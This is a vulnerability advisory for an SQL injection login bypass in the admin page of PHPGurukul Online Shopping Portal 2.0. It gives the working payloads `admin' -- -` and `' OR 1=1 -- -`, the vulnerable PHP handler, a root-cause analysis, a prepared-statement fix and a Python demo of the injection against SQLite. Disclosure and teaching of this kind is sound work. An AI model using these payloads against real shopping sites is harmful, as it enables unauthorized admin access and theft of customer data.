# PHPGurukul Online Shopping Portal Project 2.0 - SQL Injection Vulnerability at admin login page in `/shopping/admin/index.php`

**Exploit Title:** `PHPGurukul Online Shopping Portal Project 2.0 - SQL Injection`
**Exploit Author:** `SeaWind`
**Vendor Homepage:** `https://phpgurukul.com/`
**Software Link:** `https://phpgurukul.com/shopping-portal-free-download/`
**Version:** `2.0`
**Vulnerable endpoint:** `http://localhost/shopping/admin/index.php`
**Tested on:** `Windows 11, XAMPP`

## Description and Impact

- The admin login page (`http://localhost/shopping/admin/index.php`) is vulnerable to SQL injection through the `username` parameter. The injected input closes the string literal and comments out the password condition, so an attacker can log in to the admin panel (for example `http://localhost:88/admin/todays-orders.php`) without knowing any admin password.

## Steps to reproduce

- First visit the page `http://localhost/shopping/admin/index.php`

  ![image](https://hackmd.io/_uploads/S167wAfAA.png)

- In the `username` field enter the payload `admin' -- -`; the `password` field can contain anything. In my example I fill the `username` field with the payload `admin' -- -` and the `password` field with `123`.

  ![image](https://hackmd.io/_uploads/H1QeYAMRA.png)

- Finally click the `login` button. With that I was able to log in to the admin panel page without knowing the real password.

  ![image](https://hackmd.io/_uploads/Sky4YCzAR.png)

## Root Cause Analysis

```php
<?php
session_start();
error_reporting(0);
include("include/config.php");
if(isset($_POST['submit']))
{
    $username=$_POST['username'];
    $password=md5($_POST['password']);
    $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
    $num=mysqli_fetch_array($ret);
    if($num>0)
    {
        $extra="change-password.php";
        $_SESSION['alogin']=$_POST['username'];
        $_SESSION['id']=$num['id'];
        header("location:change-password.php");
        exit();
    }
    else
    {
        $_SESSION['errmsg']="Invalid username or password";
        header("location:index.php");
        exit();
    }
}
?>
```

- This is the login handler in `/shopping/admin/index.php`. On line 9 (the `mysqli_query()` call), `$username` is taken straight from `$_POST['username']` and interpolated into `SELECT * FROM admin WHERE username='$username' and password='$password'` with no validation, escaping or parameter binding, which makes the query injectable. `$password` is passed through `md5()` first, which produces a hex string that cannot break out of its quotes, so `username` is the only injectable parameter in this query.
- With the payload `admin' -- -`, the statement MySQL receives is `SELECT * FROM admin WHERE username='admin' -- -' and password='<md5>'`. The single quote closes the literal and `-- ` starts a comment that swallows the rest of the line, including the password condition. MySQL only treats `--` as a comment start when it is followed by whitespace; the trailing `-` keeps that space from being trimmed on the way in.
- The check `if($num>0)` only tests whether `mysqli_fetch_array()` returned a row at all, so any input that makes the `WHERE` clause true logs the attacker in as the first matching admin row, and the raw payload is stored in `$_SESSION['alogin']`. `error_reporting(0)` additionally hides any SQL error a malformed payload would otherwise surface.
- The fix is to stop building the query from user input: bind both values with `mysqli_prepare()` and `bind_param()` (or PDO prepared statements), and replace unsalted `md5()` password storage with `password_hash()`/`password_verify()`.
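To show the mechanics concretely, here is an added Python example (not code from the PHPGurukul project or from this advisory) that rebuilds the exact query string the handler sends, runs it against an in-memory SQLite table standing in for the MySQL `admin` table (SQLite also treats `-- ` as a line comment), and contrasts it with the parameterized form of the same query. It goes slightly beyond the page's payload to show why a bare `' OR '1'='1` does not work against this particular query while `' OR 1=1 -- -` does. The table contents, the password `S3cret!`, and the function names are constructed for the demo.

```python
"""Added demonstration, not code from the PHPGurukul project: rebuild the
query that /shopping/admin/index.php sends and run it against an in-memory
SQLite stand-in for the MySQL `admin` table, beside the parameterized form."""
import hashlib
import sqlite3

# Constructed sample row: the attacker does not know this password.
SAMPLE_ADMIN = ("admin", hashlib.md5(b"S3cret!").hexdigest())


def new_db() -> sqlite3.Connection:
    """Minimal stand-in for the real `admin` table (only the columns the query uses)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO admin (username, password) VALUES (?, ?)", SAMPLE_ADMIN)
    return con


def build_vulnerable_query(username: str, password: str) -> str:
    """Same string the PHP handler builds: raw username interpolated, password
    MD5-hashed first (hex only, so it cannot break out of its quotes)."""
    md5_pw = hashlib.md5(password.encode()).hexdigest()
    return f"SELECT * FROM admin WHERE username='{username}' and password='{md5_pw}'"


def vulnerable_login(con: sqlite3.Connection, username: str, password: str):
    """Mirrors the PHP branch: a returned row means the login is accepted."""
    return con.execute(build_vulnerable_query(username, password)).fetchone()


def safe_login(con: sqlite3.Connection, username: str, password: str):
    """Parameterized version: the driver binds username as data, so the quote
    and the comment marker stay inside the literal instead of ending it."""
    md5_pw = hashlib.md5(password.encode()).hexdigest()
    return con.execute(
        "SELECT * FROM admin WHERE username=? and password=?", (username, md5_pw)
    ).fetchone()


if __name__ == "__main__":
    con = new_db()
    payload = "admin' -- -"
    print(build_vulnerable_query(payload, "123"))
    # The comment swallows the password clause, so the admin row comes back.
    print("vulnerable handler:", vulnerable_login(con, payload, "123"))
    # `' OR '1'='1` alone does NOT work here: AND binds tighter than OR, so the
    # password condition still applies. A comment is needed to drop it.
    print("OR-only payload:", vulnerable_login(con, "' OR '1'='1", "123"))
    print("OR with comment:", vulnerable_login(con, "' OR 1=1 -- -", "123"))
    print("parameterized handler:", safe_login(con, payload, "123"))
```

Running it prints the injected statement, the admin row returned by the interpolated query, `None` for the OR-only payload, the row again for the commented OR payload, and `None` from the parameterized query for every injected input. The parameterized form still uses the page's unsalted `md5()` on purpose, so that the only difference under test is how the username reaches the database.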